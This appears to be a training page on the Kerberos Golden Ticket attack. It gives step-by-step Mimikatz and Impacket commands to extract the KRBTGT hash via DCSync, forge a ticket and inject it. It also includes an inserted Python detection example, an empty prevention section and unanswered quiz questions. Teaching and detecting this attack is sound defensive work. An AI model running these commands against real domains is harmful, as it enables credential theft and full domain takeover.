What is a Golden Ticket Attack?
The Golden Ticket attack allows attackers to forge a Kerberos Ticket Granting Ticket (TGT) by using the KRBTGT account's hash from Active Directory (AD). This forged TGT grants the attacker unlimited access to any service within the domain, including Domain Admin rights.
Why is Golden Ticket Attack Dangerous?
● Provides persistence in the environment, even if the attacker is discovered.
● Allows attackers to bypass authentication mechanisms and gain full control of all machines in the domain.
● Can be used offline, meaning the attacker doesn't need continuous access to the Domain Controller once the ticket is forged.
________________________________________
How Does a Golden Ticket Attack Work? (Step-by-Step)
Step 1: Attacker Gains Domain Admin Privileges
● To carry out a Golden Ticket attack, the attacker first needs the KRBTGT account's hash, which in practice means compromising a Domain Admin account (or one with equivalent replication rights).
● The attacker can retrieve this hash through techniques such as DCSync, Mimikatz, or extracting it from the Domain Controller's memory.
Example Command to Extract the KRBTGT Hash (Mimikatz)
mimikatz.exe
lsadump::dcsync /domain:example.com /user:krbtgt
Extracts the KRBTGT account's NTLM hash.
________________________________________
Step 2: Forge the Golden Ticket (Using the KRBTGT Hash)
● The attacker builds a TGT and encrypts and signs it with the KRBTGT account hash, the same key the KDC uses, so every Domain Controller accepts the forged ticket as genuine.
● The attacker can use the TGT to impersonate any user, including high-privileged accounts like Domain Admins.
Example Command to Create a Golden Ticket (Mimikatz)
mimikatz.exe
kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4: /ticket:golden_ticket.kirbi
Creates a forged TGT for the Administrator account, which can be used to authenticate.
Step 3: Use the Golden Ticket for Access
● The forged TGT is used to request service tickets from the KDC (Key Distribution Center) for any service within the domain.
● The attacker can use this TGT to gain full access to the domain, including administrative privileges.
Example Command to Use the Golden Ticket (Mimikatz)
mimikatz.exe
kerberos::ptt golden_ticket.kirbi
Injects the forged TGT into memory for authentication and gains access as Administrator.
________________________________________
Step 4: Maintain Persistence
● The Golden Ticket gives persistent access to the domain, even if the attacker's original credentials are discovered and reset or the Domain Controllers are rebooted.
● As long as the KRBTGT account's hash is not changed, the attacker can use the forged TGT at any time.
________________________________________
Tool | Usage
Mimikatz | Forge and inject Golden Tickets into memory
Impacket (GetUserSPNs.py, ticketer.py) | Interact with Kerberos tickets and create forged TGTs
Kerberos Exploit Kit (KeX) | Generate Golden Tickets and perform other Kerberos attacks
________________________________________
Example Commands for Each Tool
1. Forge a Golden Ticket with Mimikatz
mimikatz.exe
kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4: /ticket:golden_ticket.kirbi
Creates a Golden Ticket that can be used to authenticate as Administrator.
________________________________________
2. Use the Golden Ticket with Mimikatz (Pass-the-Ticket)
mimikatz.exe
kerberos::ptt golden_ticket.kirbi
Injects the Golden Ticket into memory to impersonate the user and authenticate.
________________________________________
3. Use Impacket's ticketer.py (Forge Golden Ticket)
python3 ticketer.py -domain example.com -sid S-1-5-21-1234567890-1234567890-1234567890 -rc4 -user Administrator
Generates a Golden Ticket for the specified user.
________________________________________
How to Detect & Prevent Golden Ticket Attacks
Detection (Blue Team)
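The detection section on this page has no body, so here is an added example (not from the original page) of the two checks a blue team would run: spotting service-ticket requests that never had a matching TGT request, and checking that the KRBTGT password has been reset recently, the defence Step 4 and the Summary describe. Event IDs 4768 and 4769 are the real Windows Security log IDs; the event records, the account list and the policy thresholds below are constructed assumptions.

```python
"""Golden Ticket indicators over Windows Security events (added example).

Event 4768 = a TGT was requested (AS-REQ); event 4769 = a service ticket
was requested (TGS-REQ). A forged TGT is never requested from the KDC, so
its holder produces 4769s with no 4768 behind them. All records below are
constructed sample data, not real log output.
"""
from datetime import datetime, timedelta

# Assumed policy values: default TGT lifetime is 10 hours; the 180-day
# KRBTGT rotation interval is an assumed organisational policy.
TGT_MAX_LIFETIME = timedelta(hours=10)
KRBTGT_MAX_AGE_DAYS = 180

# Reason strings returned by the detector.
NO_TGT = "service ticket requested with no TGT request for this account within the TGT lifetime"
UNKNOWN_ACCOUNT = "account name does not exist in AD"
RC4_TICKET = "RC4 ticket encryption in an AES-only domain"

# Constructed accounts the domain actually contains.
KNOWN_ACCOUNTS = {"alice", "bob", "Administrator", "krbtgt"}

# Constructed events. "etype" mirrors the TicketEncryptionType field:
# 0x12 = AES256-CTS-HMAC-SHA1, 0x17 = RC4-HMAC.
SAMPLE_EVENTS = [
    # Normal logon: TGT first, then a service ticket a few seconds later.
    {"id": 4768, "time": "2024-05-01T08:00:00", "account": "alice", "ip": "10.0.0.5", "etype": 0x12},
    {"id": 4769, "time": "2024-05-01T08:00:04", "account": "alice", "ip": "10.0.0.5", "etype": 0x12},
    # Service ticket for Administrator with no 4768 anywhere in the log, RC4-encrypted.
    {"id": 4769, "time": "2024-05-01T09:15:00", "account": "Administrator", "ip": "10.0.0.77", "etype": 0x17},
    # Forged ticket for a user name that does not exist in AD at all.
    {"id": 4769, "time": "2024-05-01T09:16:00", "account": "svc_backup2", "ip": "10.0.0.77", "etype": 0x17},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def detect_golden_ticket(events, known_accounts, window=TGT_MAX_LIFETIME, aes_only=True):
    """Return one finding per suspicious 4769, with the reasons it was flagged."""
    tgt_times = {}  # lower-cased account -> timestamps of its 4768 events
    for e in events:
        if e["id"] == 4768:
            tgt_times.setdefault(e["account"].lower(), []).append(parse_time(e["time"]))

    known = {a.lower() for a in known_accounts}
    findings = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] != 4769:
            continue
        account = e["account"].lower()
        when = parse_time(e["time"])
        reasons = []
        # Any 4768 for this account in the preceding TGT lifetime explains the 4769.
        recent = [t for t in tgt_times.get(account, []) if timedelta(0) <= when - t <= window]
        if not recent:
            reasons.append(NO_TGT)
        if account not in known:
            reasons.append(UNKNOWN_ACCOUNT)
        if aes_only and e["etype"] == 0x17:
            reasons.append(RC4_TICKET)
        if reasons:
            findings.append({"account": e["account"], "time": e["time"], "ip": e["ip"], "reasons": reasons})
    return findings


def krbtgt_reset_overdue(password_last_set, now, max_age_days=KRBTGT_MAX_AGE_DAYS):
    """True when the KRBTGT password (pwdLastSet in AD) is older than policy allows."""
    return now - password_last_set > timedelta(days=max_age_days)


if __name__ == "__main__":
    for f in detect_golden_ticket(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"{f['time']} {f['account']} from {f['ip']}: " + "; ".join(f["reasons"]))
    # Constructed pwdLastSet value for krbtgt.
    last_set = datetime(2023, 1, 1)
    if krbtgt_reset_overdue(last_set, datetime(2024, 5, 1)):
        print("krbtgt password is overdue for reset")
```

In production the events come from the Domain Controllers' Security logs (all DCs, since the 4768 may be on a different DC than the 4769), and the account list from AD. The RC4 check only helps where the domain has actually moved to AES. When the KRBTGT reset is overdue, reset it twice with replication allowed to complete in between: the KDC still honours tickets issued under the previous key, so a single reset leaves an existing Golden Ticket valid.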
Prevention (Security Hardening)
________________________________________
Summary
● The Golden Ticket attack allows attackers to forge Kerberos TGTs and gain persistent access to any service or account in the domain.
● It requires access to the KRBTGT account's hash, which can be obtained through techniques like DCSync.
● Defenses include changing the KRBTGT password regularly, monitoring Kerberos events, and using MFA.
Tools: mimikatz, Impacket
Question 1.
What is the main goal of a Golden Ticket attack?
Question 2.
Which account hash is required to forge a Golden Ticket?
Question 3.
Which tool is commonly used to perform Golden Ticket attacks?
Question 4.
What is injected into memory to authenticate as a forged user in a Golden Ticket attack?
Question 5.
What does the attacker impersonate with a Golden Ticket?
Question 6.
Which attack allows an attacker to request a forged TGT after obtaining the KRBTGT hash?
Question 7.
Which command in Mimikatz creates a Golden Ticket?
Question 8.
What can the forged Golden Ticket be used for?
Question 9.
What must be done to maintain persistence after a Golden Ticket attack?
Question 10.
Which tool can also generate Golden Tickets apart from Mimikatz?
Question 11.
What event ID should be monitored for suspicious TGT requests?
Question 12.
What should be regularly changed to defend against Golden Ticket attacks?
Question 13.
Which type of authentication method can help prevent Golden Ticket attacks?
Question 14.
What tool can be used to track changes to Kerberos tickets and other activities?
Question 15.
Which tool can be used to monitor Kerberos events and detect anomalies?